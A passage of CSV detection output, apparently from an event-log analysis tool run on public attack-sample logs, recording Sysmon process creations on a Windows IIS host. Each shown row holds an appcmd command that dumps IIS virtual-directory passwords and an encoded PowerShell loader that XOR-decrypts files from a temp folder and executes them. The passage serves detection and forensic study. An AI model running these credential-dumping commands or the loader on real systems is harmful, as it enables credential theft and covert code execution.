AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.143 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.233 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.323 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.403 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.473 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.563 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 